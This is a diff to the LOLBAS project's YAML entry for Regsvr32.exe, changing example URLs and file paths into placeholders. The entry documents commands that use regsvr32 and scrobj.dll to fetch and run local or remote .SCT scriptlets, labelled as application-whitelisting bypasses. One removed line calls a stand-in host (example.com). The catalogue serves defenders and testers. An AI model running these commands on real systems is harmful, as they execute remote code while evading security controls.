mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 12:42:19 +02:00
@@ -1,10 +1,10 @@
|
||||
---
|
||||
Name: Regsvr32.exe
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Author: Oddvar Moe
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
- Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: AWL Bypass
|
||||
@@ -14,7 +14,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: SCT
|
||||
- Execute: Remote
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
- Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: AWL Bypass
|
||||
@@ -23,7 +23,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: SCT
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
- Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: Execute
|
||||
@@ -33,7 +33,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: SCT
|
||||
- Execute: Remote
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
- Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: Execute
|
||||
|
Reference in New Issue
Block a user